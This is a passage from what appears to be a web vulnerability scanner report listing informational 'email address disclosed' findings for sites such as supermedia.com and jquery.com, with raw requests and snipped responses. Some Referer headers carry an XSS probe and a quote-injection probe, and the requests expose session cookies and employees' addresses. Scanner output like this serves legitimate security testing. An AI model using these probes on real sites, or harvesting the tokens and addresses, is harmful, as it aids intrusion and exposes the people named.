Cookie: ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; geo=US; s_ria=Flash%2010%7C; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_orientationHeight=1012; s_ppv=%5B%5BB%5D%5D; s_orientation=%5B%5BB%5D%5D; s_pathLength=homepage%3D1%2Citunes%3D1%2C; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3B; dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod; s_pv=itunes%20-%20index%20(us); s_cc=true; s_sq=appleglobal%2Cappleitunes%2Cappleusitunesipod%3D%2526pid%253Ditunes%252520-%252520index%252520(us)%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Fipad%25252F%2526ot%253DA%26applehome%3D%2526pid%253Dapple%252520-%252520index%252520(us)%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Fitunes%25252F_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 11 Jul 2008 11:54:18 GMT
ETag: "1fc2-451be3396ce80"
Vary: Accept-Encoding
Server: Apache/2.2.11 (Unix)
X-N: S
X-Serial: 199
X-Check-Cacheable: NO
X-Cache-TTL: 527
X-Cached-Time: Mon, 04 Oct 2010 01:56:44 GMT
Content-Type: application/x-javascript
ntCoent-length: 8130
Cache-Control: max-age=297
Expires: Thu, 03 Feb 2011 17:54:54 GMT
Date: Thu, 03 Feb 2011 17:49:57 GMT
Connection: close
Content-Length: 8130

/**
* Event Mixins
* (c) 2006 Seth Dillingham <seth.dillingham@gmail.com>
*
* This software is hereby released into the public domain. Do with it as
* you please, but with the understand
...[SNIP]...

23.18. http://images.apple.com/global/scripts/lib/scriptaculous.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.apple.com
Path:   /global/scripts/lib/scriptaculous.js

Issue detail

The following email address was disclosed in the response:

Request

GET /global/scripts/lib/scriptaculous.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/
Cache-Control: max-age=0
If-Modified-Since: Tue, 13 May 2008 05:05:45 GMT
Accept: */*
If-None-Match: "1cf46-44d159ddcfc40"
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; geo=US; dfa_cookie=appleglobal%2Capplehome; s_pv=apple%20-%20index%20(US); s_orientation=%5B%5BB%5D%5D; s_ria=Flash%2010%7C; s_pathLength=homepage%3D1%2C; s_vnum_us=ch%3Dhomepage%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3B; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_ppv=100%2C100%2C1012%2C; s_orientationHeight=1012; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 13 May 2008 05:05:45 GMT
ETag: "1cf46-44d159ddcfc40"
Vary: Accept-Encoding
Server: Apache/2.2.14 (Unix)
X-N: S
X-Cache-TTL: 600
X-Cached-Time: Wed, 20 Oct 2010 18:29:51 GMT
Content-Type: application/x-javascript
Cteonnt-length: 118598
Cache-Control: max-age=413
Expires: Thu, 03 Feb 2011 17:54:01 GMT
Date: Thu, 03 Feb 2011 17:47:08 GMT
Connection: close
Content-Length: 118598

// script.aculo.us scriptaculous.js v1.8.0, Tue Nov 06 15:01:40 +0300 2007

// Copyright (c) 2005-2007 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
//
// Permission is hereby granted, f
...[SNIP]...
<tdd@tddsworld.com>
...[SNIP]...

23.19. http://ir.supermedia.com/contactus.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ir.supermedia.com
Path:   /contactus.cfm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /contactus.cfm HTTP/1.1
Host: ir.supermedia.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NOMOBILE=0; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; mbox=session#1296759528614-838261#1296763633|check#true#1296761833; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:36:57 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:57 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:57 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:57 GMT;path=/
Vary: Accept-Encoding
Content-Length: 21608


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>SuperMedia - Contact Us</title>

<meta http-equiv="Content-Type"
...[SNIP]...
<a href="mailto:Cliff.wilson@supermedia.com">Cliff.wilson@supermedia.com</a>
...[SNIP]...
<a href="mailto:Brenda.l.davis@supermedia.com">Brenda.l.davis@supermedia.com</a>
...[SNIP]...

23.20. http://ir.supermedia.com/question.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ir.supermedia.com
Path:   /question.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /question.cfm HTTP/1.1
Host: ir.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763633|check#true#1296761833;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 03 Feb 2011 19:47:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8

<html>
<head>
<style type="text/css">
<!--
html, body, p {font-family: arial, helvetical, sans-serif;font-size: 12px;}
h1 {font-size: 14px;}
-->
</style>

<script language="Javascript">

   
...[SNIP]...
<a href=\"mailto:webmaster@shareholder.com?subject=" + escape("Error on page ") + document.location.host + escape("/question.cfm") + "&body=%0D%0A%0D%0A%0D%0AQueryString:%20" + escape(location.search) + "%0D%0AReferring%20Page:%20" + escape(do
...[SNIP]...

23.21. http://ir.supermedia.com/releasedetail.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ir.supermedia.com
Path:   /releasedetail.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /releasedetail.cfm HTTP/1.1
Host: ir.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 03 Feb 2011 19:36:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8

<html>
<head>
<style type="text/css">
<!--
html, body, p {font-family: arial, helvetical, sans-serif;font-size: 12px;}
h1 {font-size: 14px;}
-->
</style>

<script language="Javascript">

   
...[SNIP]...
<a href=\"mailto:webmaster@shareholder.com?subject=" + escape("Error on page ") + document.location.host + escape("/releasedetail.cfm") + "&body=%0D%0A%0D%0A%0D%0AQueryString:%20" + escape(location.search) + "%0D%0AReferring%20Page:%20" + esca
...[SNIP]...

23.22. http://ir.supermedia.com/releasedetail.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ir.supermedia.com
Path:   /releasedetail.cfm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /releasedetail.cfm?ReleaseID=546698 HTTP/1.1
Host: ir.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:36:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A06%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:06 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:06 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:06 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<hea
...[SNIP]...
<a href="mailto:andrew.shane@supermedia.com">andrew.shane@supermedia.com</a>
...[SNIP]...
<a href="mailto:cliff.wilson@supermedia.com">cliff.wilson@supermedia.com</a>
...[SNIP]...

23.23. http://jquery.com/files/social/js/jquery.tabs.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jquery.com
Path:   /files/social/js/jquery.tabs.js

Issue detail

The following email address was disclosed in the response:

Request

GET /files/social/js/jquery.tabs.js HTTP/1.1
Accept: */*
Referer: http://docs.jquery.com/UI/Dialog?1%2527=1
Accept-Language: en-US
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: jquery.com

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 02:30:27 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 11 Sep 2007 01:50:21 GMT
ETag: "603a292-7d01-53f01140"
Accept-Ranges: bytes
Content-Length: 32001
Connection: close
Content-Type: application/x-javascript

/**
* Tabs - jQuery plugin for accessible, unobtrusive tabs
* @requires jQuery v1.0.3
*
* http://stilbuero.de/tabs/
*
* Copyright (c) 2006 Klaus Hartl (stilbuero.de)
* Dual licensed under the M
...[SNIP]...
up the several tab containers such a structure is expressed by "div>div".
* Default value: "div".
* @type jQuery
*
* @name tabs
* @cat Plugins/Tabs
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/
$.fn.tabs = function(initial, settings) {

// settings
if (typeof initial == 'object') settings = initial; // no initial tab given but a settings object
settings = $.extend({
i
...[SNIP]...
be activated. If this parameter is omitted, the first tab
* will be activated.
* @type jQuery
*
* @name triggerTab
* @cat Plugins/Tabs
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Disable a tab, so that clicking it has no effect.
*
* @example $('#container').disableTab(2);
* @desc Disable the second tab of the tab interface contained in <div id="container">
...[SNIP]...
be disabled. If this parameter is omitted, the first tab
* will be disabled.
* @type jQuery
*
* @name disableTab
* @cat Plugins/Tabs
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

/**
* Enable a tab that has been disabled.
*
* @example $('#container').enableTab(2);
* @desc Enable the second tab of the tab interface contained in <div id="container">
...[SNIP]...
be enabled. If this parameter is omitted, the first tab
* will be enabled.
* @type jQuery
*
* @name enableTab
* @cat Plugins/Tabs
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

var tabEvents = ['triggerTab', 'disableTab', 'enableTab'];
for (var i = 0; i < tabEvents.length; i++) {
$.fn[tabEvents[i]] = (function(tabEvent) {
return function(tab) {
r
...[SNIP]...
<div id="container">.
*
* @type Number
*
* @name activeTab
* @cat Plugins/Tabs
* @author Klaus Hartl/klaus.hartl@stilbuero.de
*/

$.fn.activeTab = function() {
var selectedTabs = [];
this.each(function() {
var nav = $('ul.tabs-nav' , this);
nav = nav.size() && nav || $('>
...[SNIP]...

23.24. http://jqueryui.com/about  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /about

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 03 Feb 2011 19:47:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 15111

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...
<a href="mailto:contact@appendto.com">contact@appendTo.com</a>
...[SNIP]...
<a href="mailto:hello@filamentgroup.com">hello@filamentgroup.com</a>
...[SNIP]...

23.25. http://l0.scanscout.com/ssframework/logController.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l0.scanscout.com
Path:   /ssframework/logController.xml

Issue detail

The following email address was disclosed in the response:

Request

GET /ssframework/logController.xml HTTP/1.1
Host: l0.scanscout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: osh=626_1296767643681; JSESSIONID=EC2ECA527A6D86A1BF90D5DB051B04A3; sssrvyhst2=110203_1414196|110203_1426141; campUnique=1414196_1426141; psh=626_1296767254411; behavioralSegments=29_110203_2|32_110203_2|263_110203; uniques=110203|626_110203; streamHistory=delete; networkInfo=57058|110203_161409|626|33687174|null|5933178|1414196|1|12.0|true|1|true|us|V|717380|2||57872|110203_160737|626|33687174|null|5945246|1426141|1|14.0|true|4|true|us|V; userCookie=4673e32b6fda399c64d2cb48d3800e10;

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 03 Feb 2011 22:06:18 GMT
Server: Apache
ETag: W/"632-1295277908000"
Last-Modified: Mon, 17 Jan 2011 15:25:08 GMT
Content-Length: 632
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title>Error Detected</title>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <meta http-equiv="
...[SNIP]...
<p> Please contact our support staff at support@scanscout.com</p>
...[SNIP]...

23.26. http://my.supermedia.com/CammsServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://my.supermedia.com
Path:   /CammsServlet

Issue detail

The following email address was disclosed in the response:

Request

GET /CammsServlet?assetid=198 HTTP/1.1
Host: my.supermedia.com
Proxy-Connection: keep-alive
Referer: http://www.supermedia.com/social-responsibility/corporate-governance
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296763650|check#true#1296761850; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:36:26 GMT
Set-Cookie: JSESSIONID=NLD6ljxjQJDXGQgrK61P3yT1JkXkjgDLb1jBKjgFT6wzymnbnMhk!-550558129!-1173275059; path=/
Content-disposition: filename=1263325254349AUDIT_COMMITTEE_CHARTER.PDF
Content-Type: application/pdf
Server: Unspecified
Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:44:02 GMT;path=/;httponly
Content-Length: 37726

%PDF-1.4%....
39 0 obj <</Linearized 1/L 37726/O 41/E 9062/N 9/T 36899/H [ 616 317]>>endobj
xref
39 16
0000000016 00000 n
0000000933 00000 n
0000001050 00000 n
0000001299
...[SNIP]...
<pdfx:_AuthorEmail>Theresa.Murray@supermedia.com</pdfx:_AuthorEmail>
...[SNIP]...
rporate Documents)/Author(Fulbright & Jaworski L.L.P. User)/Creator(Acrobat PDFMaker 7.0.7 for Word)/_AuthorEmailDisplayName(Murray, Theresa)/Producer(Acrobat Distiller 7.0.5 \(Windows\))/_AuthorEmail(Theresa.Murray@supermedia.com)/ModDate(D:20100112133851-06'00')/_AdHocReviewCycleID(725058457)/Company(Fulbright & Jaworski L.L.P.)/xA(13402)/Title(Fulbright & Jaworski L.L.P. Document)/xB(45831573.7)/xC(F)/xD(07013402)>
...[SNIP]...

23.27. http://my.supermedia.com/scripts/javascripts.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://my.supermedia.com
Path:   /scripts/javascripts.js

Issue detail

The following email address was disclosed in the response:

Request

GET /scripts/javascripts.js HTTP/1.1
Host: my.supermedia.com
Proxy-Connection: keep-alive
Referer: http://my.supermedia.com/directoryoptout/?37fe3%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E84741f5cfde=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; JSESSIONID=NLD6ljxjQJDXGQgrK61P3yT1JkXkjgDLb1jBKjgFT6wzymnbnMhk!-550558129!-1173275059; mbox=session#1296759528614-838261#1296763713|check#true#1296761913; s_cc=true; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:44:01 GMT
Last-Modified: Wed, 20 Feb 2008 21:12:24 GMT
ETag: "2832-10c5-720b5e00"
Accept-Ranges: bytes
ntCoent-Length: 4293
Content-Type: application/x-javascript
Server: Unspecified
Set-Cookie: NSC_nz-tvqfsnfejb-dpn-80=ffffffff9482e55445525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:51:37 GMT;path=/;httponly
Cache-Control: private
Content-Length: 4293


function ValidateSignIn() { // validates login form
   var frm = document.signinform;
   uid = frm.user_id.value;
   pass = frm.password.value;

   if ( uid.length == 0 || pass.length == 0 ) {
       aler
...[SNIP]...
aturedProduct(){

   // Adopted from The JavaScript Source!! //
// http://JavaScript.Internet.com/Page-Details/Floating-Link.html //
// Created By Richard Cleaver - Richard@Cleaver.Org.UK //

   var FeaturedProductTop = screen.availHeight - 270
   var FeaturedProductLeft = 619

   if(document.all){ // ie

       document.all.FeaturedProduct.style.pixelTop = document.body.scrollT
...[SNIP]...

23.28. http://opensource.org/licenses/lgpl-license.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://opensource.org
Path:   /licenses/lgpl-license.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /licenses/lgpl-license.php HTTP/1.1
Host: opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:49:57 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESSe6df14a6557d381f7820d30df9723b5b=c3sfkjibjtrtb256rtno58s211; expires=Sat, 26-Feb-2011 23:23:17 GMT; path=/; domain=.opensource.org
Last-Modified: Thu, 03 Feb 2011 19:46:16 GMT
ETag: "d39634045e5eb23dc4c9c24e32c8a468"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 6921
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="mailto:osi@opensource.org">
...[SNIP]...
<a href="mailto:webmaster@opensource.org">
...[SNIP]...

23.29. http://opensource.org/licenses/mit-license.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /licenses/mit-license.php HTTP/1.1
Host: opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:50:00 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESSe6df14a6557d381f7820d30df9723b5b=ljh26ohmvvnl63npbjcqcrvk23; expires=Sat, 26-Feb-2011 23:23:20 GMT; path=/; domain=.opensource.org
Last-Modified: Thu, 03 Feb 2011 19:46:17 GMT
ETag: "75b452b371f037c225405bd71e3aff0a"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<a href="mailto:osi@opensource.org">
...[SNIP]...
<a href="mailto:webmaster@opensource.org">
...[SNIP]...

23.30. http://search-cube.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search-cube.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: search-cube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Fri, 31 Oct 2008 11:54:37 GMT
Accept-Ranges: bytes
ETag: "80ae6724f3bc91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:35:33 GMT
Connection: close
Content-Length: 21024

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

   <title>search-cube - the Visual Search Engine</title>
   <meta name="keywords" content="search engine, Flash applicat
...[SNIP]...
<meta name="email" content="shourov@symmetri.com">
...[SNIP]...
<a href="mailto:shourov@symmetri.com?subject=search-cube beta feedback">
...[SNIP]...

23.31. http://static.jquery.com/files/rocker/scripts/custom.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.jquery.com
Path:   /files/rocker/scripts/custom.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /files/rocker/scripts/custom.js HTTP/1.1
Accept: */*
Referer: http://docs.jquery.com/UI/Dialog?1%2527=1
Accept-Language: en-US
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: static.jquery.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/x-javascript
Date: Fri, 04 Feb 2011 02:30:27 GMT
ETag: "9ed053a-2948-3909da00+gzip"
Last-Modified: Tue, 18 Aug 2009 22:41:44 GMT
Server: ECS (dca/53E8)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 10568

//jQuery Plugin: Drop Shadow Text
// call like this: $(element).textDropShadow();
(function($) {
$.fn.textDropShadow = function(){
    $(this).html('<span class="jq-shadow">'+$(this).html()+'</span><sp
...[SNIP]...
$(this).removeClass('hover');
       }
       );
   });
}

/**
* --------------------------------------------------------------------
* jQuery-Plugin "pngFix"
* Version: 1.1, 11.09.2007
* by Andreas Eberhard, andreas.eberhard@gmail.com
* http://jquery.andreaseberhard.de/
*
* Copyright (c) 2007 Andreas Eberhard
